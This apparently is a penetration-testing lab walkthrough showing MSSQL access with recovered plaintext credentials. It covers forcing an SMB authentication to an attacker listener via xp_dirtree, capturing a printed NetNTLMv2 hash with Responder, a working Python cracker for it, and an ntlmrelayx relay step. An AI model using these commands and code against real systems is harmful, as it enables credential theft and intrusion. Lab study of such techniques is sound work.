The credentials recovered earlier, will/fdsfssdfDFG4, turn out to work against the MSSQL instance on .151.

proxychains4 impacket-mssqlclient will:fdsfssdfDFG4@172.16.64.151 -port 1433 -windows-auth

Authenticate with **-windows-auth** (Windows/domain authentication rather than SQL authentication); without it the login is rejected:

15.png

Enumerate linked servers (sysservers is the legacy compatibility view; it still works here):

SQL> select srvname from sysservers;

16.png

Check which login we are running as:

SQL> select system_user;

17.png

The current login is evidently not a sysadmin, so we fall back to the attack described on P580: make the SQL Server service account authenticate to us over SMB and capture its NetNTLMv2 response. xp_dirtree is executable by low-privileged logins by default, which is why this works without sysadmin. Start Responder on the VPN interface first:

responder -I tun0

18.png

SQL> EXECUTE('master..xp_dirtree "\\192.168.49.64\a"');

19.png

The Responder terminal shows the incoming SMB authentication:

20.png

[SMB] NTLMv2-SSP Client   : ::ffff:192.168.64.159
[SMB] NTLMv2-SSP Username : TRICKY\sqlsvc
[SMB] NTLMv2-SSP Hash     : sqlsvc::TRICKY:80e42d2692c2d0d7:E67868298AC29BC3733EBF15050EAFFB:010100000000000080B0C577AE9FD8018CCD3A5CAE97F098000000000200080037004D003900590001001E00570049004E002D00390058004B0054004F00490055005100580047004D0004003400570049004E002D00390058004B0054004F00490055005100580047004D002E0037004D00390059002E004C004F00430041004C000300140037004D00390059002E004C004F00430041004C000500140037004D00390059002E004C004F00430041004C000700080080B0C577AE9FD80106000400020000000800300030000000000000000000000000300000EAB56095DB82EF7C3EC835B05F4C8C0C1D6741115F96F86D548C46B4B2DEC2650A001000000000000000000000000000000000000900240063006900660073002F003100390032002E003100360038002E00340039002E00360034000000000000000000
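What Responder printed is not a password hash but a NetNTLMv2 challenge/response: `user::domain:server_challenge:NTProofStr:blob` (hashcat mode 5600). It cannot be used in pass-the-hash; the only offline option is to guess the password, recompute NTProofStr and compare. The script below is an added example, not part of the original notes, and implements exactly that check (MD4 in pure Python because OpenSSL 3 builds of hashlib often refuse md4). The captured line is the one above; the candidate list and the forged test line with password `Winter2024!` are constructed here for illustration.

```python
"""Offline verification of a NetNTLMv2 (hashcat 5600) capture against candidate
passwords.  Added example; the candidate words and forged line are constructed."""
import hashlib
import hmac
import struct

# Verbatim Responder output from the notes above.
CAPTURED = (
    "[SMB] NTLMv2-SSP Hash     : sqlsvc::TRICKY:80e42d2692c2d0d7:E67868298AC29BC3733EBF15050EAFFB:"
    "010100000000000080B0C577AE9FD8018CCD3A5CAE97F098000000000200080037004D003900590001001E00570049004E"
    "002D00390058004B0054004F00490055005100580047004D0004003400570049004E002D00390058004B0054004F004900"
    "55005100580047004D002E0037004D00390059002E004C004F00430041004C000300140037004D00390059002E004C004F"
    "00430041004C000500140037004D00390059002E004C004F00430041004C000700080080B0C577AE9FD801060004000200"
    "00000800300030000000000000000000000000300000EAB56095DB82EF7C3EC835B05F4C8C0C1D6741115F96F86D548C46"
    "B4B2DEC2650A001000000000000000000000000000000000000900240063006900660073002F003100390032002E003100"
    "360038002E00340039002E00360034000000000000000000"
)


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, pure Python (needed for the NT hash)."""
    mask = 0xFFFFFFFF
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (f, 0, [3, 7, 11, 19], list(range(16))),
        (g, 0x5A827999, [3, 5, 9, 13], [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, [3, 9, 11, 15], [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = rol((a + fn(b, c, d) + x[idx] + k) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is what pass-the-hash would need."""
    return md4(password.encode("utf-16le"))


def ntproof(password, user, domain, challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr as the client computes it (MS-NLMP NTOWFv2 + HMAC over challenge||blob).
    The user is upper-cased, the domain is used as sent."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(key, challenge + blob, hashlib.md5).digest()


def parse_5600(line: str) -> dict:
    """Accept either a bare hashcat line or the Responder log line wrapping it."""
    raw = line.strip().split(": ", 1)[-1]
    user, _, domain, chal, proof, blob = raw.split(":")
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(chal),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def crack(line: str, candidates):
    """Return the first candidate whose NTProofStr matches the capture, else None."""
    h = parse_5600(line)
    for pw in candidates:
        if ntproof(pw, h["user"], h["domain"], h["challenge"], h["blob"]) == h["proof"]:
            return pw
    return None


def forge_5600(user, domain, password, challenge_hex, blob_hex) -> str:
    """Build a 5600 line for a known password (test-vector generator, constructed)."""
    proof = ntproof(password, user, domain, bytes.fromhex(challenge_hex), bytes.fromhex(blob_hex))
    return f"{user}::{domain}:{challenge_hex}:{proof.hex()}:{blob_hex}"


if __name__ == "__main__":
    # Constructed mini wordlist; as in the notes, a short list finds nothing for sqlsvc.
    print(crack(CAPTURED, ["password", "Password1", "sqlsvc", "Summer2023"]))
```

The 16-byte NTProofStr is keyed on a fresh server challenge and a client blob containing a timestamp, so a capture is only good for cracking or for immediate relay; this is why the next step switches to relaying.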

The hash does not appear to crack, so the service account password is presumably strong. Switch approach: instead of cracking the authentication, relay it to another host (see P584).

proxychains4 impacket-ntlmrelayx --no-http-server -smb2support -t smb://172.16.64.152

Stop Responder (or disable its SMB server in Responder.conf) before starting this, since both want port 445 on tun0; proxychains only wraps the outbound connection to .152, the SQL server still has to reach the listener on 192.168.49.64 directly. Then re-run the xp_dirtree call so that sqlsvc authenticates again. The relay only succeeds if .152 does not require SMB signing and sqlsvc has local administrator rights there.